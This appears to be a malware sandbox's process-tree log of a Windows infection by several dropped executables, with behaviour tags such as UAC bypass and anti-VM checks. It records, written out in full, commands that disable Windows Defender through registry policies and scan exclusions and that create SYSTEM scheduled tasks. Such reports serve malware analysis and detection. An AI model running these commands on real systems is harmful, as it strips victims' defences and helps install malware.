"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:8948

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:2380

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:6928

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:7640

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:5544

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:7944

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:4728

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:4620

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:8340

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:336

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:8564

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:8344

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:7536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2428

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 636
5⤵
- Program crash
PID:8904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 888
5⤵
- Program crash
PID:6508

C:\Users\Admin\AppData\Local\Temp\a\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\a\file300un.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4152

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:8648

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
3⤵
- Drops startup file
PID:7228

C:\Users\Admin\Pictures\BhkHOtQUzYlmmW5DIU7AxqxG.exe
"C:\Users\Admin\Pictures\BhkHOtQUzYlmmW5DIU7AxqxG.exe"
4⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- System policy modification
PID:8580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\BhkHOtQUzYlmmW5DIU7AxqxG.exe" -Force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:9164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
5⤵
PID:5508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
5⤵
PID:2564

C:\Users\Admin\Pictures\APnJdRJVmzw2fPsQ5tTw8dbW.exe
"C:\Users\Admin\Pictures\APnJdRJVmzw2fPsQ5tTw8dbW.exe" /s
4⤵
- Executes dropped EXE
PID:7364

C:\Users\Admin\Pictures\360TS_Setup.exe
"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
5⤵
PID:8828

C:\Program Files (x86)\1717260603_0\360TS_Setup.exe
"C:\Program Files (x86)\1717260603_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
6⤵
PID:4852

C:\Users\Admin\Pictures\21bBOAJQnvGVbwFfAGEPwDKW.exe
"C:\Users\Admin\Pictures\21bBOAJQnvGVbwFfAGEPwDKW.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:7700

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
5⤵
PID:8944

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:6296

C:\Users\Admin\Pictures\xRIa2pgMqR8CyIct629duTuA.exe
"C:\Users\Admin\Pictures\xRIa2pgMqR8CyIct629duTuA.exe"
4⤵
- Modifies firewall policy service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:5944

C:\Users\Admin\Pictures\575zAA2nhYhI8WPZEO7N09uA.exe
"C:\Users\Admin\Pictures\575zAA2nhYhI8WPZEO7N09uA.exe"
4⤵
PID:7028

C:\Users\Admin\AppData\Local\Temp\7zS6DE3.tmp\Install.exe
.\Install.exe
5⤵
PID:7616

C:\Users\Admin\AppData\Local\Temp\7zSB721.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
6⤵
PID:6556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
7⤵
PID:6872

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
8⤵
PID:6064

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
9⤵
PID:5792

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
PID:8896

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
8⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
9⤵
PID:2804

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:6544

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
8⤵
PID:8684

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
9⤵
PID:5812

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:1764

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
8⤵
PID:9180

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
9⤵
PID:3740

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:8516

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
9⤵
PID:1056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
- Command and Scripting Interpreter: PowerShell
PID:6976

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
11⤵
PID:8908

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
7⤵
PID:5744

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:3012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
- Command and Scripting Interpreter: PowerShell
PID:336

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
PID:1972

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB721.tmp\Install.exe\" PP /PWZdidqhzu 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:5228

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
7⤵
PID:5404

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
8⤵
PID:7484

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
9⤵
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 1308
7⤵
- Program crash
PID:9004

C:\Users\Admin\Pictures\A5uPwS6VLpRLrhunPkqaDohy.exe
"C:\Users\Admin\Pictures\A5uPwS6VLpRLrhunPkqaDohy.exe"
4⤵
PID:1800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\A5uPwS6VLpRLrhunPkqaDohy.exe" -Force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5604

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
5⤵
PID:7204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
5⤵
PID:7080

C:\Users\Admin\Pictures\gFkrKa9IG5Ab7GiPNWOhWDHo.exe
"C:\Users\Admin\Pictures\gFkrKa9IG5Ab7GiPNWOhWDHo.exe" /s
4⤵
PID:9188

C:\Users\Admin\Pictures\360TS_Setup.exe
"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
5⤵
PID:4912

C:\Program Files (x86)\1717260819_0\360TS_Setup.exe
"C:\Program Files (x86)\1717260819_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
6⤵
PID:9872

C:\Users\Admin\Pictures\LRklIje2e0TICjqKJXItiBcO.exe
"C:\Users\Admin\Pictures\LRklIje2e0TICjqKJXItiBcO.exe"
4⤵
PID:5364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
5⤵
PID:2124

C:\Users\Admin\Pictures\CtRHXyzsLWEWU4NBjJzolsdu.exe
"C:\Users\Admin\Pictures\CtRHXyzsLWEWU4NBjJzolsdu.exe"
4⤵
PID:5768

C:\Users\Admin\Documents\SimpleAdobe\gZbNvx8asJ4SPV_l6SCj9JJe.exe
C:\Users\Admin\Documents\SimpleAdobe\gZbNvx8asJ4SPV_l6SCj9JJe.exe
5⤵
PID:6792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:8344

C:\Users\Admin\Pictures\XzH3S5FwrfD3i3a3WhTA93yU.exe
"C:\Users\Admin\Pictures\XzH3S5FwrfD3i3a3WhTA93yU.exe"
4⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\7zS35A4.tmp\Install.exe
.\Install.exe
5⤵
PID:7756

C:\Users\Admin\AppData\Local\Temp\7zS3B90.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
6⤵
PID:6952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
7⤵
PID:8256

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
8⤵
PID:3528

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
9⤵
PID:9152

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
PID:8736

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
8⤵
PID:1052

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
9⤵
PID:6256

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:7760

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
8⤵
PID:9652

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
9⤵
PID:3036

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:9340

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
8⤵
PID:6064

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
9⤵
PID:3784

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:2160

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
PID:8572

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
9⤵
PID:4804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
- Command and Scripting Interpreter: PowerShell
PID:10052

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
7⤵
PID:8484

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:3276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
- Command and Scripting Interpreter: PowerShell
PID:7532

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
PID:1820

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3B90.tmp\Install.exe\" PP /oGXdidAccR 385118 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:9256

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
7⤵
PID:1880

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
8⤵
PID:7632

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
9⤵
PID:3248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
3⤵
PID:4732

C:\Users\Admin\AppData\Local\Temp\a\buildjudit.exe
"C:\Users\Admin\AppData\Local\Temp\a\buildjudit.exe"
2⤵
- Executes dropped EXE
PID:7592

C:\Users\Admin\AppData\Local\Temp\onefile_7592_133617340849403549\stub.exe
"C:\Users\Admin\AppData\Local\Temp\a\buildjudit.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
4⤵
PID:6296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:8540

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:6844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
4⤵
PID:7888

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6632

C:\Users\Admin\AppData\Local\Temp\a\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\a\lumma1234.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1944

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Blocklisted process makes network request
PID:2764

C:\Users\Admin\AppData\Local\Temp\a\go.exe
"C:\Users\Admin\AppData\Local\Temp\a\go.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
3⤵
PID:6580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc02a346f8,0x7ffc02a34708,0x7ffc02a34718
4⤵
PID:8976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
3⤵
PID:1020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc02a346f8,0x7ffc02a34708,0x7ffc02a34718
4⤵
PID:8400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
3⤵
PID:6972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc02a346f8,0x7ffc02a34708,0x7ffc02a34718
4⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
